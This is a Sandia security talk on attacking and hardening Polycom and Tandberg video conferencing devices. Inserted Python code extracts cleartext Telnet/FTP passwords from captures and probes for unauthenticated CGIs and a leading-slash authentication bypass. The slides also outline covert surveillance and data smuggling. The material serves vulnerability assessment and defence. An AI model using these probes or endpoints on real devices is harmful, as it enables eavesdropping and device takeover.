Who is Watching You? Video Conferencing Security
Navid Jam, Member of Technical Staff
March 1, 2007
SAND# 2007-1115C
Computer and Network Security / Security Systems and Technology / Video Conference and Collaborative Technologies
Sandia is a multiprogram laboratory operated by Sandia Corporation, a Lockheed Martin Company, for the United States Department of Energy's National Nuclear Security Administration under contract DE-AC04-94AL85000.
Something to think about: Communication Devices
Let's compare:
- Polycom VSX 8000: MSRP $12,999
- Linksys WVC200 Wireless PTZ Internet Camera with Audio: MSRP $299
- Difference: $12,700
Embedded Devices
- Specialized hardware and software
- TCP/IP
- Embedded beneficial services such as FTP, Telnet, HTTP, SNMP, H.323, etc.
- How secure are these devices?
Ocean's 11
- Intelligence gathering
- Hacking / information operations
- Using IT systems to aid a physical attack
Agenda
- Introduction
- The Center for Cyber Defenders (CCD)
- Methodology
- Findings
- Best Practices
- Future Research
- Conclusion
Introduction
- Embedded IP devices, using video conferencing as a case study
- Video conferencing usage has increased
- Video Conferencing Technology (VCT) vendors are pushing new features: IP, VoIP, data collaboration, etc.
- Little focus on security: "We have AES encryption, therefore we are secure"
- Who is responsible for securing these devices? Networking? Computer security? Video conferencing?
- What about patch management?
VCT Architecture (diagram)
Basic Protocols
- H.320: video over ISDN
- H.323: video over IP
- T.120: collaborative data sharing
- Also HD video, POTS, etc.
The Center for Cyber Defenders (CCD)
- 15-20 students a year
- Focus on information security: malicious code analysis, network programming, OS analysis, vulnerability assessments
Forefront of IP Video Conferencing Security
- Highlighting the work done by students and other staff at SNL over the past 4 years
- Codecs (Polycom and Tandberg)
- Desktop cameras
- Network infrastructure (Polycom, Tandberg and Cisco)
- Stay tuned for future announcements
Methodology
- Knowing your adversary
- What is your threat?
Red Teaming Methodology
- Six phases of research, planning, and attacking
Gain Administrative Access: Attack Tree (diagram)
Goals
Attack with the following goals:
- Compromise the system any way possible
- Conduct an independent assessment of the vulnerabilities and risks of using Video Conferencing Technology
- Develop industry best practices
- Analyze the site implementation
- Develop tools to aid in vulnerability assessment of VCT devices
Overview of Findings
- Gaining administrative access: diagnostics mode, packet sniffing, web vulnerabilities
- Surveillance: capturing and viewing traffic, auto calling, encryption, audio and video streaming, making surveillance covert
- Transmitting information to an outside source: hosting files, ISDN / IP, enabling and concealing services
- Other attacks
Some of these findings will only be described vaguely.
Gaining Administrative Access
- Diagnostics mode
- Packet sniffing
- Web vulnerabilities
Gain Administrative Access: Diagnostics Mode
BootUI mode
- Physical access: hold the power button for 10 seconds while booting up
- Remote: force BootUI mode with a buffer overflow (2005, software version 7.5.2d)
Attack
- From BootUI, copy the contents of flash to a single file
- Run strings and grep on the file
- A physical attack cannot be prevented
- The device does not log that BootUI mode was entered
Gain Administrative Access: Diagnostics Mode (contd.)
- Analyzing a chip dump
- The device also saves its password history, so the dump contains it
Gain Administrative Access: Packet Sniffing
- Telnet and FTP passwords are sent unencrypted, so anyone able to sniff the network segment can obtain them
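As an added example (not tooling from the talk), the Python below recovers the cleartext logins described on this slide from a captured client-to-server stream, the kind of data Ethereal's "Follow TCP Stream" exports. It strips Telnet option negotiation (RFC 854) so only the typed login and password remain, and pairs FTP USER/PASS commands (RFC 959). The two sample sessions embedded in the code are constructed for illustration, not captured from a Polycom.

```python
"""Recover Telnet and FTP logins from captured client->server payload.

Added example for the "Packet Sniffing" slide; this is not Sandia's tooling.
Input is the reassembled client-side TCP payload of one session. The sample
sessions at the bottom are constructed to show the shape of the data.
"""
import re

# Telnet protocol bytes (RFC 854)
IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEGOTIATION = {0xFB, 0xFC, 0xFD, 0xFE}   # WILL, WONT, DO, DONT: one option byte follows


def strip_telnet_options(stream: bytes) -> bytes:
    """Drop IAC command sequences so only the bytes the user typed remain."""
    out = bytearray()
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            out.append(stream[i])
            i += 1
        elif i + 1 < n and stream[i + 1] == IAC:      # IAC IAC = literal 0xFF
            out.append(IAC)
            i += 2
        elif i + 1 < n and stream[i + 1] == SB:       # subnegotiation up to IAC SE
            end = stream.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        elif i + 1 < n and stream[i + 1] in NEGOTIATION:
            i += 3
        else:                                         # two-byte command (NOP, AYT, ...)
            i += 2
    return bytes(out)


def telnet_typed_lines(client_stream: bytes) -> list[str]:
    """Lines the Telnet client sent. Telnet has no USER/PASS verbs, so the
    analyst pairs these with the Login:/Password: prompts seen in the
    server->client direction; the server never echoes the password back,
    but it is right here in the clear."""
    text = strip_telnet_options(client_stream).decode("ascii", "replace")
    # NVT end-of-line is CR LF; many clients send CR NUL for a bare Enter
    return [line for line in re.split(r"\r\n|\r\x00|\n", text) if line]


def ftp_credentials(client_stream: bytes) -> list[tuple[str, str]]:
    """USER/PASS pairs from an FTP control connection (RFC 959, cleartext)."""
    text = client_stream.decode("ascii", "replace")
    pairs, user = [], None
    for line in text.split("\r\n"):
        m = re.match(r"(?i)^(USER|PASS)\s+(.*)$", line)
        if not m:
            continue
        verb, arg = m.group(1).upper(), m.group(2)
        if verb == "USER":
            user = arg
        elif user is not None:          # PASS without a preceding USER: ignore
            pairs.append((user, arg))
            user = None
    return pairs


# Constructed samples (not captured traffic): DO SUPPRESS-GO-AHEAD, WILL TERMINAL-TYPE,
# then a login and password typed with Enter sent as CR NUL.
TELNET_SAMPLE = b"\xff\xfd\x03\xff\xfb\x18" + b"admin\r\x00" + b"Polyc0m!\r\x00" + b"help\r\x00"
FTP_SAMPLE = b"USER admin\r\nPASS Polyc0m!\r\nSYST\r\nPWD\r\nQUIT\r\n"

if __name__ == "__main__":
    print("telnet typed:", telnet_typed_lines(TELNET_SAMPLE))
    print("ftp creds:", ftp_credentials(FTP_SAMPLE))
```

The same parsing applies to any cleartext management protocol on these devices; the defensive counterpart is the best-practice slide's advice to disable Telnet and FTP and, where the firmware offers them, use the encrypted variants instead.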
Gain Administrative Access: Web Vulnerabilities
- Unauthenticated CGIs
- Buffer overflows
- GET requests
- POST requests
Gain Administrative Access: Unauthenticated CGIs
2004, software version 6.0.1
- http://<host>/getsekure.cgi: returns the administrative password
- http://<host>/getaddressbook.cgi: returns all entries in the address book
- http://<host>/getcalllog.cgi: returns a list of all video calls the device has participated in
Gain Administrative Access: Buffer Overflows
Exploiting a buffer overflow vulnerability (2005, software version 7.5.2d)
- Upload a single file to the web server
- The system then stops requiring authentication for Telnet and FTP connections (until the next reboot)
Gain Administrative Access: GET / POST Requests
2006, software version 8.5
- Able to retrieve the admin password unauthenticated
- Able to change the admin password unauthenticated
- Some.file has this comment in the code: /*. We may want to look into making this more secure */
- A number of web vulnerabilities
- New Security Mode features: encryption, HTTPS, TelnetS, FTPS, etc.
- All of the attacks and streaming can be performed over the encrypted channels
Gain Administrative Access: What does this mean?
Having administrative rights gives a person complete control of the Polycom device, including:
- Placing a script on the device that automatically dials a third device when called
- Configuring the device to accept any call
- Smuggling files to an outside network using the Polycom device
- Changing the password, preventing legitimate users from using the device
- Forcing the device to use a gatekeeper which can falsify audio and video
Surveillance
- Capturing and viewing traffic
- Auto calling
- Encryption
- Video and audio streaming
- Covert audio streaming
- Making surveillance covert
Surveillance: Capturing and Viewing Traffic
- Capture with Ethereal
- Decode and view with Observer
Surveillance: Auto Calling
Use scripts to initiate calls to a third party (sites: Livermore, Albuquerque, Attacker):
1. The Viewstation in Albuquerque has a previously loaded script
2. Livermore calls Albuquerque
3. The Viewstation in Albuquerque runs the script, which calls the attacker's Viewstation
Surveillance: Encryption, Video & Audio Streaming
2006, software version 8.5
- Making changes through encrypted channels
- Streaming audio and video
- Making audio streaming covert
Surveillance: What does this mean?
- Any conference that uses VCT devices on an unencrypted network can be recorded and replayed by anyone connected to that network
- Any conference that uses Polycom VCT devices can be eavesdropped on using auto dialing over ISDN and IP
Transmitting Information to an Outside Source: Hosting Files
- Upload files unauthenticated to the Polycom web server
- Upload files to the Polycom with FTP and an administrative password
Maximum file size that can be uploaded:
  Device          Software release   Max upload
  Viewstation VS  7.2.4              1 MB
  Viewstation FX  5.1 FX             3 MB
  VS 4000         6.0.4 FX           3 MB
  VSX 8000        8.5                3 MB
Transmitting Information to an Outside Source: Hosting Files (contd.)
2005, software version 7.5.2d
- Telnet to the web service (port 80) and use the PUT command
- Initial attempts caused the device to crash erratically
Transmitting Information to an Outside Source: IP / ISDN
- System files can be accessed and modified
- The OS can be fooled into treating arbitrary files as system files by giving them the same names
- The ISDN line can be used to transfer data outside
- 2006, software version 8.5: the IP traffic can be encrypted as well
- Enabling and concealing services
Transmitting Information to an Outside Source: What does this mean?
Information can be passed to an outside source using the Polycom VCT devices, such as:
- Sensitive information a user intentionally added to system files
- Configuration files
- Call logs
- The administrator password
Other Attacks
- Deny service
- Inject / falsify video using gatekeepers and gateways
- Use VCT devices as a launching point for other attacks: compromised host, Java / JavaScript programs, port scanners, vulnerability scanners, enterprise management
What About Tandberg?
2004, software versions Classic Model E2.1 and E4.0
- Not perfect: all pages on the Tandberg device could be requested if the leading / is left off the GET request sent to the HTTP server
  - GET request with the leading /: rejected
  - GET request without the leading /: accepted without authentication
- Administrator password set using GET and plugin_set
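The following Python is an added example, not a tool from the talk, that checks a device's HTTP server for both authentication weaknesses described above: the Polycom CGIs that answer without credentials (the "Unauthenticated CGIs" slide) and the Tandberg request-line bypass where "GET page" is served although "GET /page" is rejected. The CGI names are the three on the Polycom slide; the protected page name admin.html and the fake device used for the offline demo are constructed here, since the slides only show screenshots. Requests are written by hand on a socket because urllib and similar libraries would silently add the leading slash the Tandberg check must omit.

```python
"""Probe a VCT device's web server for two authentication weaknesses:
Polycom CGIs that answer unauthenticated, and the Tandberg leading-slash bypass.

Added example; not from the talk. Point tcp_sender() at a lab unit; the
fake_device() below is a constructed stand-in so the script runs offline.
"""
import socket
from typing import Callable

Sender = Callable[[bytes], bytes]   # raw request bytes -> raw response bytes

POLYCOM_CGIS = ("getsekure.cgi", "getaddressbook.cgi", "getcalllog.cgi")


def tcp_sender(host: str, port: int = 80, timeout: float = 5.0) -> Sender:
    """Sender that really talks to a device, one connection per request."""
    def send(request: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    return send


def status_code(response: bytes) -> int:
    """HTTP status from the first line; 0 if the device answered garbage."""
    parts = response.split(b"\r\n", 1)[0].split()
    if len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].isdigit():
        return int(parts[1])
    return 0


def request_line(target: str, host: str) -> bytes:
    # HTTP/1.0 so the server closes the connection and recv() sees EOF.
    # `target` is sent verbatim: "/page" or the bare "page" under test.
    return f"GET {target} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


def unauthenticated_cgis(host: str, send: Sender, cgis=POLYCOM_CGIS) -> list[str]:
    """CGIs that return 200 with a body to a request carrying no credentials."""
    exposed = []
    for cgi in cgis:
        resp = send(request_line("/" + cgi, host))
        body = resp.split(b"\r\n\r\n", 1)[1] if b"\r\n\r\n" in resp else b""
        if status_code(resp) == 200 and body.strip():
            exposed.append(cgi)
    return exposed


def leading_slash_bypass(host: str, page: str, send: Sender) -> bool:
    """True when a page is refused as /page but served when the slash is omitted."""
    with_slash = status_code(send(request_line("/" + page, host)))
    bare = status_code(send(request_line(page, host)))
    return with_slash in (401, 403) and bare == 200


# Constructed fake device for an offline demo. It mimics the behaviour on the
# slides; it is not a real firmware image. Replace with tcp_sender("<codec-ip>").
def fake_device(request: bytes) -> bytes:
    target = request.split(b"\r\n", 1)[0].split()[1].decode()
    answers = {
        "/getsekure.cgi": b"HTTP/1.0 200 OK\r\n\r\nadmin\r\n",
        "/getcalllog.cgi": b"HTTP/1.0 200 OK\r\n\r\n2006-05-01 14:02 192.0.2.10\r\n",
        "/getaddressbook.cgi": b"HTTP/1.0 404 Not Found\r\n\r\n",
        "/admin.html": b"HTTP/1.0 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"codec\"\r\n\r\n",
        "admin.html": b"HTTP/1.0 200 OK\r\n\r\n<html>admin page</html>\r\n",
    }
    return answers.get(target, b"HTTP/1.0 404 Not Found\r\n\r\n")


if __name__ == "__main__":
    print("exposed CGIs:", unauthenticated_cgis("codec.example", fake_device))
    print("leading-slash bypass:", leading_slash_bypass("codec.example", "admin.html", fake_device))
```

The leading-slash check is a generic test for authorization decisions made on the raw request target rather than on a normalized path; it is worth running against any embedded web server, not only the two vendors named here.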
What About Tandberg (contd.)
Some problems in 2004:
- Auto dialing
- Uploading / transmitting files (9 megabytes)
- Surveillance
Also:
- Better vendor support with respect to security
- More stable IP stack
- Targeted attacks ongoing
Best Practices for VCT Devices: Device
- Physically secure the devices
- Update firmware
- Disable all unneeded and rarely used protocols (e.g. FTP, Telnet, SNMP, and HTTP*)
- Disable auto answer for incoming calls
- Develop a strong administrator password and change it periodically
- Restart the devices on a weekly basis
- Take a snapshot (MD5, SHA[n]) of all of the system files and periodically verify that they have not been modified (or just reinstall the OS periodically)
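An added example (not a Sandia tool) of the last item above: a snapshot-and-verify script that hashes every file under a directory, stores the manifest as JSON, and on re-run reports files that were modified, added or removed. It uses SHA-256 rather than MD5, since MD5 collisions are cheap today. Pulling the files off the codec (by FTP with the administrative password, as the talk did) is outside the script; the demo works on a constructed temporary tree that mimics the tampering described on earlier slides (a startup script altered, a smuggled file added).

```python
"""Baseline and verify a codec's system files.

Added example for the "take a snapshot" best practice; not from the talk.
The demo tree is constructed in a temporary directory and deleted afterwards.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_tree(root: str) -> dict[str, str]:
    """Map of relative POSIX path -> SHA-256 hex digest for every regular file."""
    root_path = Path(root)
    manifest = {}
    for path in sorted(p for p in root_path.rglob("*") if p.is_file()):
        h = hashlib.sha256()
        with path.open("rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        manifest[path.relative_to(root_path).as_posix()] = h.hexdigest()
    return manifest


def save_baseline(manifest: dict[str, str], dest: str) -> None:
    # Keep the baseline off the device: a compromised codec could rewrite it too.
    Path(dest).write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_baseline(src: str) -> dict[str, str]:
    return json.loads(Path(src).read_text())


def diff_manifests(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Changes between two manifests; each list is sorted for stable reports."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a fake system tree, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = Path(tmp) / "codec"
        (tree / "etc").mkdir(parents=True)
        (tree / "etc" / "config.dat").write_bytes(b"autoanswer=no\n")
        (tree / "etc" / "addrbook.dat").write_bytes(b"Livermore,192.0.2.20\n")
        (tree / "startup.scr").write_bytes(b"# boot script\n")

        baseline_file = Path(tmp) / "baseline.json"        # stored outside the tree
        save_baseline(hash_tree(str(tree)), str(baseline_file))

        # Tampering of the kind the slides describe
        (tree / "startup.scr").write_bytes(b"# boot script\ndial 192.0.2.99\n")  # modified
        (tree / "etc" / "payload.bin").write_bytes(b"\x00" * 16)                 # added
        (tree / "etc" / "addrbook.dat").unlink()                                 # missing

        return diff_manifests(load_baseline(str(baseline_file)), hash_tree(str(tree)))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run the verification from a management host on a schedule, and treat any non-empty "modified" or "added" list as an incident to investigate rather than something to re-baseline over.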
Best Practices for VCT Devices: Network
- Use Access Control Lists (ACLs) and/or routers to help secure the network on which the devices operate
- Any computer (IP) allowed past the ACL must itself be well guarded, so that surveillance software cannot be installed on it to sniff the traffic and send it offsite
- Use VLANs
- Use encryption across all WAN links as well as internally for important calls
- Keep routers, switches and firewalls up to date
Best Practices for VCT Devices: Management Server
- Keep the server up to date with security patches
- Limit access to the server via strict ACLs
- Encrypt traffic between the management clients and devices
Best Practices for VCT Devices: Policy
- Shut off the devices when they are not in use
- Develop and enforce a strong password policy
- Develop policies that forbid circumventing network security to sniff/monitor traffic
- Develop a working relationship and information sharing with the vendor, based on Service Level Agreements
- Conduct routine security audits of devices
- Conduct periodic reviews/scans to audit ACLs and ensure they are working
Sandia Security Switch (S3)
- Patent pending
- TSCM approved
Open PCS Security Architecture for Interoperable Design (OPSAID)
- Designed for add-on security for embedded devices: SCADA, video conferencing, legacy systems, etc.
- Provides secure management / configuration, logging and monitoring capabilities, firewalls, IDS, and encryption
Further Areas for Research
- Impact of connecting with other vulnerable codecs
- Inserting malicious code into the video stream
- ISDN
- Gatekeepers, gateways and bridges as another means of attack
- T.120 security issues
- Room controllers
- Systematic approach to security: codec, network, conference room / desktop
Conclusion
- Many benefits to video conferencing
- Polycom devices continue to be insecure
- Polycom is making a number of security improvements; however, they are more of a bandage than a comprehensive security overhaul
- Tandberg has better vendor support with respect to security
- Technical and policy-based recommendations help mitigate some of the current threat
- Multilayered approach to security: ACLs, VLANs, encryption, user training
Questions / Comments
Navid Jam
njam@sandia.gov
925-294-6379
Environment (diagram)
Gather Information About Devices
- Google
- White papers
- Documentation
- Nessus and other vulnerability scanners
- Spiders
- Social engineering
- etc.
S3 Block Diagram (diagram)